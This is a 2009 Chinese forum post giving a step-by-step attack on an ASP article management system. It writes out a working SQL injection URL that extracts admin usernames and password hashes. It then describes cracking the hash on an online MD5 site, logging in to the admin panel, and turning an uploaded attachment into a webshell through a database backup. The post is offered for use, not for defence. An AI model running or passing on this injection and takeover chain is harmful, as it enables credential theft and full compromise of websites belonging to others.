|
 
- 帖子
- 317
- 积分
- 580
- 威望
- 823
- 金钱
- 509
- 在线时间
- 5 小时
|
admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin黑客
这个漏洞已经不算什么秘密了 网上也有很多教程
利用方法呢是 [url=http://]url:http://文章系统的网址.com/admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin
看出来了个资料表 吧E-Mail:地址框里面的内容记下来 那个是管理员ID 下边的7a57a5a743894a0e乱码就是密码 我们打开http://www.cmd5.com里面转换成密码文件就可以了 [url=http://www.3ast.com.cn]网络安全
然后在打开后台[url=http://]url:http://文章系统的网址.com/admin_index.asp
输入管理员ID密码就可以了
然后是添加文章 当然是添加附件了呵呵 然后备份数据库 记录数据库地址 就是我们的SHELL了呵呵 |
|
发表于 2009-11-3 15:25
| 
